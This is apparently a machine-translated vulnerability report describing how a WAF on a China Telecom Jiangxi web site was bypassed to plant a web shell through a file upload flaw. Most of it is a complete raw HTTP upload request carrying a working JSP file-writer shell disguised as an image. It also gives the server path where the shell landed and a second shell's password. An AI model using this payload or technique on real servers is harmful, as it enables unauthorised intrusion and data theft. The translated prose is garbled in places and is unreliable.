China Telecom Jiangxi main site can be accessed by getshell over waf

China Telecom Jiangxi main site can be accessed by getshell over waf

Verify getshell

Address: http ://**. **. **. **/res/active/4G/upload. jsp (login required) Upload Vulnerability is also installed with security software, so I killed all my horses


However, this is not the focus.


Upload pony first
 

POST http://**.**.**.**/AttachmentServlet?backUrl=/service/upload/img_upload.jsp HTTP/1.1Host: **.**.**.**Connection: keep-aliveContent-Length: 1912Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360EEContent-Type: multipart/form-data; boundary=----WebKitFormBoundarytrI8QHebOAmXLH47Referer: http://**.**.**.**/service/upload/img_upload.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: s_fid=7BC739F3593E85F7-08481DCFE53A3A4E; lvid=1d399cc664257927153a6c35ee4ff517; nvid=1; cityCode=bj; SHOPID_COOKIEID=10001; NETJSESSIONID1=mZB6WVKBzT2FHtMzJQsQHL2XKwXnptCVV6d8TGW5Hpwmnwz0DJvt!1311323526; _pk_ref.345.1592=%5B%22%22%2C%22%22%2C1448462879%2C%22https%3A%2F%2F**.**.**.**%2Flink%3Furl%3DAdVaFcKcHEIDY_dgfI7lFNi07sx14l5wvtP6LLBt1KfJf4ocSDar9jooSmBxFHkx4XLQLPYBXj_lg5viFvr1ya%26wd%3D%26eqid%3Df78656fa000104b7000000045655c9fe%22%2C%220%22%5D; Hm_lvt_4ae12616aa0a873fc63cbdccf4a2e47a=1448462879; Hm_lpvt_4ae12616aa0a873fc63cbdccf4a2e47a=1448462910; _pk_id.345.1592=c1efc092521c47e5.1448462879.1.1448462910.1448462879.; _pk_ses.345.1592=*------WebKitFormBoundarytrI8QHebOAmXLH47Content-Disposition: form-data; name="uploadFile"; filename="240.php"Content-Type: image/jpeg<%@page contenttype="text/html; charset=GBK" import="**.**.**.**.*;"><%
String path=request.getParameter("path");String content=request.getParameter("content");String url=request.getRequestURI();String relativeurl=url.substring(url.indexOf(&#039;/&#039;,1));String absolutepath=application.getRealPath(relativeurl);if (path!=null && !path.equals("") && content!=null && !content.equals("")){  try{    File newfile=new File(path);    PrintWriter writer=new PrintWriter(newfile);    writer.println(content);    writer.close();    if (newfile.exists() && newfile.length()>0)    {      out.println("1!");    }else{      out.println("2!");    }  }catch(Exception e)  {    e.printStackTrace();  }}out.println("");%>------WebKitFormBoundarytrI8QHebOAmXLH47Content-Disposition: form-data; name="fileName"240.jsp------WebKitFormBoundarytrI8QHebOAmXLH47Content-Disposition: form-data; name="filePath"C:\fakepath\240.jpg------WebKitFormBoundarytrI8QHebOAmXLH47Content-Disposition: form-data; name="comments"240.jpg------WebKitFormBoundarytrI8QHebOAmXLH47Content-Disposition: form-data; name="rela_no"content------WebKitFormBoundarytrI8QHebOAmXLH47--
 

<% @ Page contenttype = "text/html; charset = GBK" import = "**. *;">

Pony address: http: // **. **/temp/res/upload/20151125/images/20151125231655.jsp


Note that the address obtained by pony is a fake address. Fortunately, the actual address is returned during the upload.


/Home/weblogic/Oracle/Middleware/wssnet/temp/res/upload/20151125/images/
 

 

You also need to find a Trojan-free upload task.



Http: // **. **/temp/res/upload/20151125/images/55.jsp password 123
 

I am afraid I will be beaten. What should I do if I come to my house for development?

Solution:

Verify File Upload